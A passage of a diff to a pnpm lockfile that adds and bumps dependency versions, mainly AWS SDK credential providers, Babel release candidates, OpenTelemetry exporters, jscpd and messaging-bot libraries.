2.8.1 + '@aws-sdk/credential-provider-http@3.972.18': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/types': 3.973.5 + '@smithy/fetch-http-handler': 5.3.13 + '@smithy/node-http-handler': 4.4.14 + '@smithy/property-provider': 4.2.11 + '@smithy/protocol-http': 5.3.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + '@smithy/util-stream': 4.5.17 + tslib: 2.8.1 + '@aws-sdk/credential-provider-ini@3.972.13': dependencies: '@aws-sdk/core': 3.973.15 @@ -6419,6 +7024,25 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/credential-provider-ini@3.972.17': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/credential-provider-env': 3.972.16 + '@aws-sdk/credential-provider-http': 3.972.18 + '@aws-sdk/credential-provider-login': 3.972.17 + '@aws-sdk/credential-provider-process': 3.972.16 + '@aws-sdk/credential-provider-sso': 3.972.17 + '@aws-sdk/credential-provider-web-identity': 3.972.17 + '@aws-sdk/nested-clients': 3.996.7 + '@aws-sdk/types': 3.973.5 + '@smithy/credential-provider-imds': 4.2.11 + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/credential-provider-login@3.972.13': dependencies: '@aws-sdk/core': 3.973.15 @@ -6432,6 +7056,19 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/credential-provider-login@3.972.17': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/nested-clients': 3.996.7 + '@aws-sdk/types': 3.973.5 + '@smithy/property-provider': 4.2.11 + '@smithy/protocol-http': 5.3.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/credential-provider-node@3.972.14': dependencies: '@aws-sdk/credential-provider-env': 3.972.13 @@ -6449,6 +7086,23 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/credential-provider-node@3.972.18': + dependencies: + '@aws-sdk/credential-provider-env': 3.972.16 + '@aws-sdk/credential-provider-http': 3.972.18 + '@aws-sdk/credential-provider-ini': 3.972.17 + '@aws-sdk/credential-provider-process': 3.972.16 + '@aws-sdk/credential-provider-sso': 3.972.17 + '@aws-sdk/credential-provider-web-identity': 3.972.17 + '@aws-sdk/types': 3.973.5 + '@smithy/credential-provider-imds': 4.2.11 + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/credential-provider-process@3.972.13': dependencies: '@aws-sdk/core': 3.973.15 @@ -6458,6 +7112,15 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/credential-provider-process@3.972.16': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/types': 3.973.5 + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/credential-provider-sso@3.972.13': dependencies: '@aws-sdk/core': 3.973.15 @@ -6471,6 +7134,19 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/credential-provider-sso@3.972.17': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/nested-clients': 3.996.7 + '@aws-sdk/token-providers': 3.1004.0 + '@aws-sdk/types': 3.973.5 + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/credential-provider-web-identity@3.972.13': dependencies: '@aws-sdk/core': 3.973.15 @@ -6483,6 +7159,18 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/credential-provider-web-identity@3.972.17': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/nested-clients': 3.996.7 + '@aws-sdk/types': 3.973.5 + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/eventstream-handler-node@3.972.9': dependencies: '@aws-sdk/types': 3.973.4 @@ -6538,6 +7226,13 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/middleware-host-header@3.972.7': + dependencies: + '@aws-sdk/types': 3.973.5 + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/middleware-location-constraint@3.972.6': dependencies: '@aws-sdk/types': 3.973.4 @@ -6550,6 +7245,12 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/middleware-logger@3.972.7': + dependencies: + '@aws-sdk/types': 3.973.5 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/middleware-recursion-detection@3.972.6': dependencies: '@aws-sdk/types': 3.973.4 @@ -6558,6 +7259,14 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/middleware-recursion-detection@3.972.7': + dependencies: + '@aws-sdk/types': 3.973.5 + '@aws/lambda-invoke-store': 0.2.3 + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/middleware-sdk-s3@3.972.15': dependencies: '@aws-sdk/core': 3.973.15 @@ -6591,6 +7300,17 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/middleware-user-agent@3.972.19': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/types': 3.973.5 + '@aws-sdk/util-endpoints': 3.996.4 + '@smithy/core': 3.23.9 + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + '@smithy/util-retry': 4.2.11 + tslib: 2.8.1 + '@aws-sdk/middleware-websocket@3.972.10': dependencies: '@aws-sdk/types': 3.973.4 @@ -6649,6 +7369,49 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/nested-clients@3.996.7': + dependencies: + '@aws-crypto/sha256-browser': 5.2.0 + '@aws-crypto/sha256-js': 5.2.0 + '@aws-sdk/core': 3.973.18 + '@aws-sdk/middleware-host-header': 3.972.7 + '@aws-sdk/middleware-logger': 3.972.7 + '@aws-sdk/middleware-recursion-detection': 3.972.7 + '@aws-sdk/middleware-user-agent': 3.972.19 + '@aws-sdk/region-config-resolver': 3.972.7 + '@aws-sdk/types': 3.973.5 + '@aws-sdk/util-endpoints': 3.996.4 + '@aws-sdk/util-user-agent-browser': 3.972.7 + '@aws-sdk/util-user-agent-node': 3.973.4 + '@smithy/config-resolver': 4.4.10 + '@smithy/core': 3.23.9 + '@smithy/fetch-http-handler': 5.3.13 + '@smithy/hash-node': 4.2.11 + '@smithy/invalid-dependency': 4.2.11 + '@smithy/middleware-content-length': 4.2.11 + '@smithy/middleware-endpoint': 4.4.23 + '@smithy/middleware-retry': 4.4.40 + '@smithy/middleware-serde': 4.2.12 + '@smithy/middleware-stack': 4.2.11 + '@smithy/node-config-provider': 4.3.11 + '@smithy/node-http-handler': 4.4.14 + '@smithy/protocol-http': 5.3.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + '@smithy/url-parser': 4.2.11 + '@smithy/util-base64': 4.3.2 + '@smithy/util-body-length-browser': 4.2.2 + '@smithy/util-body-length-node': 4.2.3 + '@smithy/util-defaults-mode-browser': 4.3.39 + '@smithy/util-defaults-mode-node': 4.2.42 + '@smithy/util-endpoints': 3.3.2 + '@smithy/util-middleware': 4.2.11 + '@smithy/util-retry': 4.2.11 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/region-config-resolver@3.972.6': dependencies: '@aws-sdk/types': 3.973.4 @@ -6657,6 +7420,14 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/region-config-resolver@3.972.7': + dependencies: + '@aws-sdk/types': 3.973.5 + '@smithy/config-resolver': 4.4.10 + '@smithy/node-config-provider': 4.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/s3-request-presigner@3.1000.0': dependencies: '@aws-sdk/signature-v4-multi-region': 3.996.3 @@ -6689,6 +7460,18 @@ snapshots: transitivePeerDependencies: - aws-crt + '@aws-sdk/token-providers@3.1004.0': + dependencies: + '@aws-sdk/core': 3.973.18 + '@aws-sdk/nested-clients': 3.996.7 + '@aws-sdk/types': 3.973.5 + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + transitivePeerDependencies: + - aws-crt + '@aws-sdk/token-providers@3.999.0': dependencies: '@aws-sdk/core': 3.973.15 @@ -6706,6 +7489,11 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/types@3.973.5': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@aws-sdk/util-arn-parser@3.972.2': dependencies: tslib: 2.8.1 @@ -6718,6 +7506,14 @@ snapshots: '@smithy/util-endpoints': 3.3.1 tslib: 2.8.1 + '@aws-sdk/util-endpoints@3.996.4': + dependencies: + '@aws-sdk/types': 3.973.5 + '@smithy/types': 4.13.0 + '@smithy/url-parser': 4.2.11 + '@smithy/util-endpoints': 3.3.2 + tslib: 2.8.1 + '@aws-sdk/util-format-url@3.972.6': dependencies: '@aws-sdk/types': 3.973.4 @@ -6736,6 +7532,13 @@ snapshots: bowser: 2.14.1 tslib: 2.8.1 + '@aws-sdk/util-user-agent-browser@3.972.7': + dependencies: + '@aws-sdk/types': 3.973.5 + '@smithy/types': 4.13.0 + bowser: 2.14.1 + tslib: 2.8.1 + '@aws-sdk/util-user-agent-node@3.973.0': dependencies: '@aws-sdk/middleware-user-agent': 3.972.15 @@ -6744,6 +7547,20 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@aws-sdk/util-user-agent-node@3.973.4': + dependencies: + '@aws-sdk/middleware-user-agent': 3.972.19 + '@aws-sdk/types': 3.973.5 + '@smithy/node-config-provider': 4.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + + '@aws-sdk/xml-builder@3.972.10': + dependencies: + '@smithy/types': 4.13.0 + fast-xml-parser: 5.3.8 + tslib: 2.8.1 + '@aws-sdk/xml-builder@3.972.8': dependencies: '@smithy/types': 4.13.0 @@ -6780,10 +7597,10 @@ snapshots: jsonwebtoken: 9.0.3 uuid: 8.3.2 - '@babel/generator@8.0.0-rc.1': + '@babel/generator@8.0.0-rc.2': dependencies: - '@babel/parser': 8.0.0-rc.1 - '@babel/types': 8.0.0-rc.1 + '@babel/parser': 8.0.0-rc.2 + '@babel/types': 8.0.0-rc.2 '@jridgewell/gen-mapping': 0.3.13 '@jridgewell/trace-mapping': 0.3.31 '@types/jsesc': 2.5.1 @@ -6795,15 +7612,15 @@ snapshots: '@babel/helper-validator-identifier@7.28.5': {} - '@babel/helper-validator-identifier@8.0.0-rc.1': {} + '@babel/helper-validator-identifier@8.0.0-rc.2': {} '@babel/parser@7.29.0': dependencies: '@babel/types': 7.29.0 - '@babel/parser@8.0.0-rc.1': + '@babel/parser@8.0.0-rc.2': dependencies: - '@babel/types': 8.0.0-rc.1 + '@babel/types': 8.0.0-rc.2 '@babel/runtime@7.28.6': {} @@ -6812,10 +7629,10 @@ snapshots: '@babel/helper-string-parser': 7.27.1 '@babel/helper-validator-identifier': 7.28.5 - '@babel/types@8.0.0-rc.1': + '@babel/types@8.0.0-rc.2': dependencies: '@babel/helper-string-parser': 8.0.0-rc.2 - '@babel/helper-validator-identifier': 8.0.0-rc.1 + '@babel/helper-validator-identifier': 8.0.0-rc.2 '@bcoe/v8-coverage@1.0.2': {} @@ -6823,7 +7640,7 @@ snapshots: '@buape/carbon@0.0.0-beta-20260216184201(@discordjs/opus@0.10.0)(hono@4.12.5)(opusscript@0.1.1)': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 discord-api-types: 0.38.37 optionalDependencies: '@cloudflare/workers-types': 4.20260120.0 @@ -6864,15 +7681,27 @@ snapshots: picocolors: 1.1.1 sisteransi: 1.0.5 + '@clack/core@1.1.0': + dependencies: + sisteransi: 1.0.5 + '@clack/prompts@1.0.1': dependencies: '@clack/core': 1.0.1 picocolors: 1.1.1 sisteransi: 1.0.5 + '@clack/prompts@1.1.0': + dependencies: + '@clack/core': 1.1.0 + sisteransi: 1.0.5 + '@cloudflare/workers-types@4.20260120.0': optional: true + '@colors/colors@1.5.0': + optional: true + '@cypress/request-promise@5.0.0(@cypress/request@3.0.10)(@cypress/request@3.0.10)': dependencies: '@cypress/request': 3.0.10 @@ -6980,7 +7809,7 @@ snapshots: '@discordjs/voice@0.19.0(@discordjs/opus@0.10.0)(opusscript@0.1.1)': dependencies: '@types/ws': 8.18.1 - discord-api-types: 0.38.40 + discord-api-types: 0.38.41 prism-media: 1.3.5(@discordjs/opus@0.10.0)(opusscript@0.1.1) tslib: 2.8.1 ws: 8.19.0 @@ -7105,11 +7934,21 @@ snapshots: abort-controller: 3.0.0 grammy: 1.41.0 + '@grammyjs/runner@2.0.3(grammy@1.41.1)': + dependencies: + abort-controller: 3.0.0 + grammy: 1.41.1 + '@grammyjs/transformer-throttler@1.2.1(grammy@1.41.0)': dependencies: bottleneck: 2.19.5 grammy: 1.41.0 + '@grammyjs/transformer-throttler@1.2.1(grammy@1.41.1)': + dependencies: + bottleneck: 2.19.5 + grammy: 1.41.1 + '@grammyjs/types@3.25.0': {} '@grpc/grpc-js@1.14.3': @@ -7271,6 +8110,41 @@ snapshots: '@js-sdsl/ordered-map@4.4.2': {} + '@jscpd/badge-reporter@4.0.4': + dependencies: + badgen: 3.2.3 + colors: 1.4.0 + fs-extra: 11.3.3 + + '@jscpd/core@4.0.4': + dependencies: + eventemitter3: 5.0.4 + + '@jscpd/finder@4.0.4': + dependencies: + '@jscpd/core': 4.0.4 + '@jscpd/tokenizer': 4.0.4 + blamer: 1.0.7 + bytes: 3.1.2 + cli-table3: 0.6.5 + colors: 1.4.0 + fast-glob: 3.3.3 + fs-extra: 11.3.3 + markdown-table: 2.0.0 + pug: 3.0.3 + + '@jscpd/html-reporter@4.0.4': + dependencies: + colors: 1.4.0 + fs-extra: 11.3.3 + pug: 3.0.3 + + '@jscpd/tokenizer@4.0.4': + dependencies: + '@jscpd/core': 4.0.4 + reprism: 0.0.11 + spark-md5: 3.0.2 + '@keyv/bigmap@1.3.1(keyv@5.6.0)': dependencies: hashery: 1.5.0 @@ -7648,6 +8522,18 @@ snapshots: '@node-llama-cpp/win-x64@3.16.2': optional: true + '@nodelib/fs.scandir@2.1.5': + dependencies: + '@nodelib/fs.stat': 2.0.5 + run-parallel: 1.2.0 + + '@nodelib/fs.stat@2.0.5': {} + + '@nodelib/fs.walk@1.2.8': + dependencies: + '@nodelib/fs.scandir': 2.1.5 + fastq: 1.20.1 + '@nolyfill/domexception@1.0.28': {} '@octokit/app@16.1.2': @@ -7798,374 +8684,375 @@ snapshots: '@octokit/request-error': 7.1.0 '@octokit/webhooks-methods': 6.0.0 - '@opentelemetry/api-logs@0.212.0': + '@opentelemetry/api-logs@0.213.0': dependencies: '@opentelemetry/api': 1.9.0 '@opentelemetry/api@1.9.0': {} - '@opentelemetry/configuration@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/configuration@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) yaml: 2.8.2 - '@opentelemetry/context-async-hooks@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/context-async-hooks@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/core@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 '@opentelemetry/semantic-conventions': 1.40.0 - '@opentelemetry/exporter-logs-otlp-grpc@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-logs-otlp-grpc@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@grpc/grpc-js': 1.14.3 '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-grpc-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-logs': 0.212.0(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-grpc-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-logs': 0.213.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-logs-otlp-http@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-logs-otlp-http@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/api-logs': 0.212.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-logs': 0.212.0(@opentelemetry/api@1.9.0) + '@opentelemetry/api-logs': 0.213.0 + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-logs': 0.213.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-logs-otlp-proto@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-logs-otlp-proto@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/api-logs': 0.212.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-logs': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/api-logs': 0.213.0 + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-logs': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-grpc@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-metrics-otlp-grpc@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@grpc/grpc-js': 1.14.3 '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-http': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-grpc-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-metrics': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-metrics-otlp-http': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-grpc-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-metrics': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-http@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-metrics-otlp-http@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-metrics': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-metrics': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-proto@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-metrics-otlp-proto@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-http': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-metrics': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-metrics-otlp-http': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-metrics': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-prometheus@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-prometheus@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-metrics': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-metrics': 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions': 1.40.0 - '@opentelemetry/exporter-trace-otlp-grpc@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-trace-otlp-grpc@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@grpc/grpc-js': 1.14.3 '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-grpc-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-grpc-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-trace-otlp-http@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-trace-otlp-http@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-trace-otlp-proto@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-trace-otlp-proto@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-zipkin@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/exporter-zipkin@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions': 1.40.0 - '@opentelemetry/instrumentation@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/instrumentation@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/api-logs': 0.212.0 - import-in-the-middle: 2.0.6 + '@opentelemetry/api-logs': 0.213.0 + import-in-the-middle: 3.0.0 require-in-the-middle: 8.0.1 transitivePeerDependencies: - supports-color - '@opentelemetry/otlp-exporter-base@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/otlp-exporter-base@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-grpc-exporter-base@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/otlp-grpc-exporter-base@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@grpc/grpc-js': 1.14.3 '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-exporter-base': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer': 0.212.0(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-exporter-base': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/otlp-transformer': 0.213.0(@opentelemetry/api@1.9.0) - '@opentelemetry/otlp-transformer@0.212.0(@opentelemetry/api@1.9.0)': + 